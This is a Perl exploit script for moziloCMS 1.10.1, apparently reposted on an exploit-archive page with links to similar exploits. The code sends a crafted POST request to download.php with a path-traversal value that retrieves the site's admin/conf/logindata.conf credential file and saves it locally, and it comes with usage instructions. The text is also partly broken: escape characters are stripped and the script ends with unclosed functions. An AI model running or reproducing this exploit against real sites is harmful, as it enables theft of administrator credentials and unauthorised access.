moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

摘要：#!/usr/bin/perl##moziloCMS1.10.1Perlexploit##discovered&writtenbyAms#a...

#!/usr/bin/perl

# moziloCMS 1.10.1 Perl exploit

# discovered & written by Ams

# ax330d [doggy] gmail [dot] com

# DESCRIPTION:

# Vulnerability hides in "download.php", which we can use to download any file we want to.

# Here, for example, "admin/conf/logindata.conf". (Btw, not very smart solution to keep it open

# not looking on that it is protected by .htaccess)

# Script does not filters global params, it only checks whether local file exists...

# (By the way, all downloads are logged to "/conf/downloads.conf")

# USAGE:

# Run exploit :perl expl.pl http://www.site.com

# NEEDED:

# magic_quotes_gpc = off

use strict;

use IO::Socket;

print "nt~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ntt moziloCMS 1.10.1 exploit (by Ams)

nt~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~nn";

if(@ARGV<1){

die "ntUsage:texpl.pl [host]nn

ntExample:texpl.pl http://localhost/blog/nn";

}

my $expl_url = $ARGV[0];

print "nt[~] Starting exploit...n";

if($expl_url =~ m#http://#) {

exploit($expl_url);

} else {

exploit('http://'.$expl_url);

}

sub exploit {

# Defining vars.

my $site = pop @_;

my ($a, $b, $c, @d) = split ///,$site;

my $path = join('/',@d);

my $host = $c;

if($path) {$path = '/'.$path;}

my ($length, $packet, $downloaded, $injection);

# Revealing /data/sess.php.

print "nt[~] Sending request to 'downloads.php'...n";

$injection = "file=hola&cat=../admin/conf/logindata.conf";

$length = length($injection);

$packet = "POST $path/download.php HTTP/1.1rn";

$packet .= "Host: $hostrn";

$packet .= "Connection: Closern";

$packet .= "Content-Type: application/x-www-form-urlencodedrn";

$packet .= "Content-Length: $lengthrnrn";

$packet .= "$injection";

$downloaded = send_surprise($host, $packet, 1);

if($downloaded =~ /hackin/) {

print "nt[-] Exploiting failed...n";

} elsif ($downloaded =~ /200 OK/) {

# Parsing and saving received data.

$downloaded =~ /rnrn/ ;

$downloaded = $';

open(DOWNL, ">hola.txt");

print DOWNL $downloaded;

close(DOWNL);

print "nt[ ] Looks like ok! Check hola.txtn";

} else {

print "nt[-] Exploiting failed...n";

}

sub send_surprise() {

my $dat = 1;

my ($host, $packet, $ret) = @_;

my $socket=IO::Socket::INET->new(

Proto=>"tcp",

PeerAddr=>$host,

PeerPort=>"80"

);

if( ! $socket) {

return 0;

} else {

print $socket $packet;

if($ret) {

my $rcv;

while($rcv = <$socket>) {

$dat .= $rcv;

}

close ($socket);

return $dat;

}

【moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit】相关文章：

★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

★ Rianxosencabos CMS 0.9 Remote Add Admin Exploit

★ Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

★ HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit

★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

★ trixbox (langChoice) Local File Inclusion Exploit (connect-back)

★ Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

★ Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

★ MS Internet Explorer Recordset Double Free Memory Exploit

★ DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit

上一篇： Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

下一篇： VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability

学习工具